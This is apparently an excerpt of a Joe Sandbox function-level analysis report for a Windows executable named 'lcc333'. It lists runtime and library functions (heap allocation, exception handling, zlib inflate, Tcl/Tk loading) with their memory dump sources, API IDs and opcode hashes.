                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                          • Instruction ID: 42b111ec0291e59f9900e36196065d7ff854b70ad3d4ef0cba8f3d22f10c684e
                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                          • Instruction Fuzzy Hash: 50115732A1DA4291EA60BF52D84017DE264AF96BA4FC44433FA4C57A95EF3EE4044720
                                                                                                                                                          Function 00007FF714CA6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                          • Instruction ID: fdd8d94dc2bdfa38cc2766a0814a1c368ccf04334ba08440ac72bb8379b1e4d6
                                                                                                                                                          • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                          • Instruction Fuzzy Hash: 0821F533B18E4186DB20AF1AD480379B6A0FBC5F60FA44635E69D476D5EF3CD4068B10
                                                                                                                                                          Function 00007FF714C903BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                          • Instruction ID: fe90434cdd24c27d6de11a1cefb5df4e1e8b81713805b358eb56f2e0ebe96ecd
                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                          • Instruction Fuzzy Hash: 7F018E61A08B4190EA44AF53DD80069E6A1AF96FF0F884632EE5C57BD7EE3CE5058310
                                                                                                                                                          Function 00007FF714C9EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF714C9B32A,?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A), ref: 00007FF714C9EBED
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                          • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                          • Instruction ID: abfd74905d1d6e3881f4e70f0e169aace6a0dff7c7a3f0da7623690ab9cac595
                                                                                                                                                          • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                          • Instruction Fuzzy Hash: B8F03C55B09A02A0FE587EA7DCD53B482805FAAB70F8C4932C90F462D1FE1CA4984634
                                                                                                                                                          Function 00007FF714C9D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF714C90C90,?,?,?,00007FF714C922FA,?,?,?,?,?,00007FF714C93AE9), ref: 00007FF714C9D63A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                          • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                          • Instruction ID: 8dcf037ae7d74ced9b90be3c65a598b8681a277a4b4bd488dfb007bb8a3c86ac
                                                                                                                                                          • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                          • Instruction Fuzzy Hash: EAF03A15A19A4360FE643EA39CD12B492904F86BB1F880A32D92E962C2FD2CA4898130

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00007FF714C876C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                          • API String ID: 199729137-3427451314
                                                                                                                                                          • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                          • Instruction ID: c8c4d27f7936f0409c10ddf9b20c13f929ed0fc9fbfb3f51c03f33740164624c
                                                                                                                                                          • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                          • Instruction Fuzzy Hash: 3E02B46591AF0781EA15FF67A8D01B4A3A1AF47B75BE41833D52E02260FF3CB55E8230
                                                                                                                                                          Function 00007FF714CA40AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                                          • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                          • Instruction ID: ec883f9cf127d5e0bae37f7b5775221867fd96b75772c58dc9f41e07d3c53119
                                                                                                                                                          • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                          • Instruction Fuzzy Hash: 7EB23C73E186828BE724DF26D4807FCF7A1FB51B58FA05536DA0D57A84EB38A508CB50
                                                                                                                                                          Function 00007FF714C8ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                          • API String ID: 0-2665694366
                                                                                                                                                          • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                          • Instruction ID: c85dd13bfcf1759aebdd73e60036d7983794e078cfce4695d5c4ea12ce1bc800
                                                                                                                                                          • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                          • Instruction Fuzzy Hash: AB523A72A14AA64BD7A49F15C499B7E7BEDFB85350F41413AE64A837C0EB3DD808CB10
                                                                                                                                                          Function 00007FF714C8D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                          • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                          • Instruction ID: 57cf853ffe86ed997963dbc9568b2dd694068a84ed0341406136904845115ab1
                                                                                                                                                          • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                          • Instruction Fuzzy Hash: 0F312C76608F8286EB609F61E8803EEA360FB85718F44453ADA4E47B95EF38D548C720
                                                                                                                                                          Function 00007FF714C9A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                          • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                          • Instruction ID: 0ae64e14ce28c567370f935ba27eb04350c7648869ca69b54ba4da2cb60440d9
                                                                                                                                                          • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                          • Instruction Fuzzy Hash: 9A317636608F8185DB60DF25E8802AEB7A4FB85768F940537EA9D43B55EF3CC149CB10
                                                                                                                                                          Function 00007FF714CA1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                          • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                          • Instruction ID: 2b10e2ab0dde7fadbdc5b01d6a233d6ab4bc77382e11b88e21300fca6eb9434e
                                                                                                                                                          • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                          • Instruction Fuzzy Hash: F3B1C563B18A9241EB60AF27E5801B9E391EB86FF4F945533DA5D07A85FE3CE449C310
                                                                                                                                                          Function 00007FF714C8D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                          • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                          • Instruction ID: c721aa7fb2db4b4d55873e9e2a56fc7dec35909c87c756f64b2e661023b5a39d
                                                                                                                                                          • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                          • Instruction Fuzzy Hash: FE115122B14F0589EB00DF61E8942B973B4F71AB68F440E32DA1D46764EF3CD1588350
                                                                                                                                                          Function 00007FF714CA3C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memcpy_s
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                                          • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                          • Instruction ID: 437e304e7cb34022700be35fda94fcadc74b7570a9f9ed3a23fd223c24300b69
                                                                                                                                                          • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                          • Instruction Fuzzy Hash: E6C12773B18A8687D724DF16A08466AF7A1F785F94FA08536DB4E43784EB3DE805CB40
                                                                                                                                                          Function 00007FF714C8A47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                          • API String ID: 0-1127688429
                                                                                                                                                          • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                          • Instruction ID: 9e8e455cc5f3203691c8c81cc8501b913398daac220e910e3e02f399dbb3665f
                                                                                                                                                          • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                          • Instruction Fuzzy Hash: 9BF1E672A08BDA4BE7A5AF0AC0C9B3ABAA9FF46750F45413ADA4907390DB3DD444C750
                                                                                                                                                          Function 00007FF714CA9728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                          • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                          • Instruction ID: 5fec9f2894b2c7b73f20a3ffca58c72f18e75642b0923579a976b039adff6ac2
                                                                                                                                                          • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                          • Instruction Fuzzy Hash: 38B17E77600B898BEB15CF2AC8863AC77A0F745F58F248D22DA5D837A4DB39D455C710
                                                                                                                                                          Function 00007FF714C939A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
